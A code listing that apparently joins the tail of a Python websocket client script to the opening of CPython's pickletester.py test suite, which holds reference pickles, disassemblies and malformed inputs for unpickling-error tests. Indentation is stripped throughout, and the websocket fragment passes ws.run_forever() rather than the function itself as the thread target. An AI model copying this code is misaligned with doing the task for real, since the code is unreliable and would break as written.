ws = websocket.WebSocketApp(
socket,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)
wst = threading.Thread(target=ws.run_forever())
wst.daemon = True
wst.start()
# main()
if __name__ == "__main__":
try:
connect_websocket()
except Exception as err:
print(err)
print("Connect failed")
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
save_restore_warnings_filters
)
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unheshable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL 'builtins complex'
37: q BINPUT 1
39: G BINFLOAT 3.0
48: G BINFLOAT 0.0
57: \x86 TUPLE2
58: q BINPUT 2
60: R REDUCE
61: q BINPUT 3
63: K BININT1 1
65: J BININT -1
70: K BININT1 255
72: J BININT -255
77: J BININT -256
82: M BININT2 65535
85: J BININT -65535
90: J BININT -65536
95: J BININT 2147483647
100: J BININT -2147483647
105: J BININT -2147483648
110: ( MARK
111: X BINUNICODE 'abc'
119: q BINPUT 4
121: h BINGET 4
123: c GLOBAL '__main__ C'
135: q BINPUT 5
137: ) EMPTY_TUPLE
138: \x81 NEWOBJ
139: q BINPUT 6
141: } EMPTY_DICT
142: q BINPUT 7
144: ( MARK
145: X BINUNICODE 'bar'
153: q BINPUT 8
155: K BININT1 2
157: X BINUNICODE 'foo'
165: q BINPUT 9
167: K BININT1 1
169: u SETITEMS (MARK at 144)
170: b BUILD
171: h BINGET 6
173: t TUPLE (MARK at 110)
174: q BINPUT 10
176: h BINGET 10
178: K BININT1 5
180: e APPENDS (MARK at 5)
181: . STOP
highest protocol among opcodes = 2
"""
DATA4 = (
b'\x80\x04\x95\xa8\x00\x00\x00\x00\x00\x00\x00]\x94(K\x00K\x01G@'
b'\x00\x00\x00\x00\x00\x00\x00\x8c\x08builtins\x94\x8c\x07'
b'complex\x94\x93\x94G@\x08\x00\x00\x00\x00\x00\x00G'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x86\x94R\x94K\x01J\xff\xff\xff\xffK'
b'\xffJ\x01\xff\xff\xffJ\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ'
b'\x00\x00\xff\xffJ\xff\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80('
b'\x8c\x03abc\x94h\x06\x8c\x08__main__\x94\x8c'
b'\x01C\x94\x93\x94)\x81\x94}\x94(\x8c\x03bar\x94K\x02\x8c'
b'\x03foo\x94K\x01ubh\nt\x94h\x0eK\x05e.'
)
# Disassembly of DATA4
DATA4_DIS = """\
0: \x80 PROTO 4
2: \x95 FRAME 168
11: ] EMPTY_LIST
12: \x94 MEMOIZE
13: ( MARK
14: K BININT1 0
16: K BININT1 1
18: G BINFLOAT 2.0
27: \x8c SHORT_BINUNICODE 'builtins'
37: \x94 MEMOIZE
38: \x8c SHORT_BINUNICODE 'complex'
47: \x94 MEMOIZE
48: \x93 STACK_GLOBAL
49: \x94 MEMOIZE
50: G BINFLOAT 3.0
59: G BINFLOAT 0.0
68: \x86 TUPLE2
69: \x94 MEMOIZE
70: R REDUCE
71: \x94 MEMOIZE
72: K BININT1 1
74: J BININT -1
79: K BININT1 255
81: J BININT -255
86: J BININT -256
91: M BININT2 65535
94: J BININT -65535
99: J BININT -65536
104: J BININT 2147483647
109: J BININT -2147483647
114: J BININT -2147483648
119: ( MARK
120: \x8c SHORT_BINUNICODE 'abc'
125: \x94 MEMOIZE
126: h BINGET 6
128: \x8c SHORT_BINUNICODE '__main__'
138: \x94 MEMOIZE
139: \x8c SHORT_BINUNICODE 'C'
142: \x94 MEMOIZE
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE
145: ) EMPTY_TUPLE
146: \x81 NEWOBJ
147: \x94 MEMOIZE
148: } EMPTY_DICT
149: \x94 MEMOIZE
150: ( MARK
151: \x8c SHORT_BINUNICODE 'bar'
156: \x94 MEMOIZE
157: K BININT1 2
159: \x8c SHORT_BINUNICODE 'foo'
164: \x94 MEMOIZE
165: K BININT1 1
167: u SETITEMS (MARK at 150)
168: b BUILD
169: h BINGET 10
171: t TUPLE (MARK at 119)
172: \x94 MEMOIZE
173: h BINGET 14
175: K BININT1 5
177: e APPENDS (MARK at 13)
178: . STOP
highest protocol among opcodes = 4
"""
# set([1,2]) pickled from 2.x with protocol 2
DATA_SET = b'\x80\x02c__builtin__\nset\nq\x00]q\x01(K\x01K\x02e\x85q\x02Rq\x03.'
# xrange(5) pickled from 2.x with protocol 2
DATA_XRANGE = b'\x80\x02c__builtin__\nxrange\nq\x00K\x00K\x05K\x01\x87q\x01Rq\x02.'
# a SimpleCookie() object pickled from 2.x with protocol 2
DATA_COOKIE = (b'\x80\x02cCookie\nSimpleCookie\nq\x00)\x81q\x01U\x03key'
b'q\x02cCookie\nMorsel\nq\x03)\x81q\x04(U\x07commentq\x05U'
b'\x00q\x06U\x06domainq\x07h\x06U\x06secureq\x08h\x06U\x07'
b'expiresq\th\x06U\x07max-ageq\nh\x06U\x07versionq\x0bh\x06U'
b'\x04pathq\x0ch\x06U\x08httponlyq\rh\x06u}q\x0e(U\x0b'
b'coded_valueq\x0fU\x05valueq\x10h\x10h\x10h\x02h\x02ubs}q\x11b.')
# set([3]) pickled from 2.x with protocol 2
DATA_SET2 = b'\x80\x02c__builtin__\nset\nq\x00]q\x01K\x03a\x85q\x02Rq\x03.'
python2_exceptions_without_args = (
ArithmeticError,
AssertionError,
AttributeError,
BaseException,
BufferError,
BytesWarning,
DeprecationWarning,
EOFError,
EnvironmentError,
Exception,
FloatingPointError,
FutureWarning,
GeneratorExit,
IOError,
ImportError,
ImportWarning,
IndentationError,
IndexError,
KeyError,
KeyboardInterrupt,
LookupError,
MemoryError,
NameError,
NotImplementedError,
OSError,
OverflowError,
PendingDeprecationWarning,
ReferenceError,
RuntimeError,
RuntimeWarning,
# StandardError is gone in Python 3, we map it to Exception
StopIteration,
SyntaxError,
SyntaxWarning,
SystemError,
SystemExit,
TabError,
TypeError,
UnboundLocalError,
UnicodeError,
UnicodeWarning,
UserWarning,
ValueError,
Warning,
ZeroDivisionError,
)
exception_pickle = b'\x80\x02cexceptions\n?\nq\x00)Rq\x01.'
# UnicodeEncodeError object pickled from 2.x with protocol 2
DATA_UEERR = (b'\x80\x02cexceptions\nUnicodeEncodeError\n'
b'q\x00(U\x05asciiq\x01X\x03\x00\x00\x00fooq\x02K\x00K\x01'
b'U\x03badq\x03tq\x04Rq\x05.')
def create_data():
c = C()
c.foo = 1
c.bar = 2
x = [0, 1, 2.0, 3.0+0j]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
class AbstractUnpickleTests(unittest.TestCase):
# Subclass must define self.loads.
_testdata = create_data()
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_unpickling_error(self, errors, data):
with self.subTest(data=data), \
self.assertRaises(errors):
try:
self.loads(data)
except BaseException as exc:
if support.verbose > 1:
print('%-32r - %s: %s' %
(data, exc.__class__.__name__, exc))
raise
def test_load_from_data0(self):
self.assert_is_copy(self._testdata, self.loads(DATA0))
def test_load_from_data1(self):
self.assert_is_copy(self._testdata, self.loads(DATA1))
def test_load_from_data2(self):
self.assert_is_copy(self._testdata, self.loads(DATA2))
def test_load_from_data3(self):
self.assert_is_copy(self._testdata, self.loads(DATA3))
def test_load_from_data4(self):
self.assert_is_copy(self._testdata, self.loads(DATA4))
def test_load_classic_instance(self):
# See issue5180. Test loading 2.x pickles that
# contain an instance of old style class.
for X, args in [(C, ()), (D, ('x',)), (E, ())]:
xname = X.__name__.encode('ascii')
# Protocol 0 (text mode pickle):
"""
0: ( MARK
1: i INST '__main__ X' (MARK at 0)
13: p PUT 0
16: ( MARK
17: d DICT (MARK at 16)
18: p PUT 1
21: b BUILD
22: . STOP
"""
pickle0 = (b"(i__main__\n"
b"X\n"
b"p0\n"
b"(dp1\nb.").replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle0))
# Protocol 1 (binary mode pickle)
"""
0: ( MARK
1: c GLOBAL '__main__ X'
13: q BINPUT 0
15: o OBJ (MARK at 0)
16: q BINPUT 1
18: } EMPTY_DICT
19: q BINPUT 2
21: b BUILD
22: . STOP
"""
pickle1 = (b'(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle1))
# Protocol 2 (pickle2 = b'\x80\x02' + pickle1)
"""
0: \x80 PROTO 2
2: ( MARK
3: c GLOBAL '__main__ X'
15: q BINPUT 0
17: o OBJ (MARK at 2)
18: q BINPUT 1
20: } EMPTY_DICT
21: q BINPUT 2
23: b BUILD
24: . STOP
"""
pickle2 = (b'\x80\x02(c__main__\n'
b'X\n'
b'q\x00oq\x01}q\x02b.').replace(b'X', xname)
self.assert_is_copy(X(*args), self.loads(pickle2))
def test_maxint64(self):
maxint64 = (1 << 63) - 1
data = b'I' + str(maxint64).encode("ascii") + b'\n.'
got = self.loads(data)
self.assert_is_copy(maxint64, got)
# Try too with a bogus literal.
data = b'I' + str(maxint64).encode("ascii") + b'JUNK\n.'
self.check_unpickling_error(ValueError, data)
def test_unpickle_from_2x(self):
# Unpickle non-trivial data from Python 2.x.
loaded = self.loads(DATA_SET)
self.assertEqual(loaded, set([1, 2]))
loaded = self.loads(DATA_XRANGE)
self.assertEqual(type(loaded), type(range(0)))
self.assertEqual(list(loaded), list(range(5)))
loaded = self.loads(DATA_COOKIE)
self.assertEqual(type(loaded), SimpleCookie)
self.assertEqual(list(loaded.keys()), ["key"])
self.assertEqual(loaded["key"].value, "value")
# Exception objects without arguments pickled from 2.x with protocol 2
for exc in python2_exceptions_without_args:
data = exception_pickle.replace(b'?', exc.__name__.encode("ascii"))
loaded = self.loads(data)
self.assertIs(type(loaded), exc)
# StandardError is mapped to Exception, test that separately
loaded = self.loads(exception_pickle.replace(b'?', b'StandardError'))
self.assertIs(type(loaded), Exception)
loaded = self.loads(DATA_UEERR)
self.assertIs(type(loaded), UnicodeEncodeError)
self.assertEqual(loaded.object, "foo")
self.assertEqual(loaded.encoding, "ascii")
self.assertEqual(loaded.start, 0)
self.assertEqual(loaded.end, 1)
self.assertEqual(loaded.reason, "bad")
def test_load_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('a\x00\xa0', protocol=0)
self.assertEqual(self.loads(b"S'a\\x00\\xa0'\n.",
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=1)
self.assertEqual(self.loads(b'U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
# From Python 2: pickle.dumps('a\x00\xa0', protocol=2)
self.assertEqual(self.loads(b'\x80\x02U\x03a\x00\xa0.',
encoding="bytes"), b'a\x00\xa0')
def test_load_python2_unicode_as_str(self):
# From Python 2: pickle.dumps(u'π', protocol=0)
self.assertEqual(self.loads(b'V\\u03c0\n.',
encoding='bytes'), 'π')
# From Python 2: pickle.dumps(u'π', protocol=1)
self.assertEqual(self.loads(b'X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
# From Python 2: pickle.dumps(u'π', protocol=2)
self.assertEqual(self.loads(b'\x80\x02X\x02\x00\x00\x00\xcf\x80.',
encoding="bytes"), 'π')
def test_load_long_python2_str_as_bytes(self):
# From Python 2: pickle.dumps('x' * 300, protocol=1)
self.assertEqual(self.loads(pickle.BINSTRING +
struct.pack("<I", 300) +
b'x' * 300 + pickle.STOP,
encoding='bytes'), b'x' * 300)
def test_constants(self):
self.assertIsNone(self.loads(b'N.'))
self.assertIs(self.loads(b'\x88.'), True)
self.assertIs(self.loads(b'\x89.'), False)
self.assertIs(self.loads(b'I01\n.'), True)
self.assertIs(self.loads(b'I00\n.'), False)
def test_empty_bytestring(self):
# issue 11286
empty = self.loads(b'\x80\x03U\x00q\x00.', encoding='koi8-r')
self.assertEqual(empty, '')
def test_short_binbytes(self):
dumped = b'\x80\x03C\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binbytes(self):
dumped = b'\x80\x03B\x04\x00\x00\x00\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
@requires_32b
def test_negative_32b_binbytes(self):
# On 32-bit builds, a BINBYTES of 2**31 or more is refused
dumped = b'\x80\x03B\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_negative_32b_binunicode(self):
# On 32-bit builds, a BINUNICODE of 2**31 or more is refused
dumped = b'\x80\x03X\xff\xff\xff\xffxyzq\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_short_binunicode(self):
dumped = b'\x80\x04\x8c\x04\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
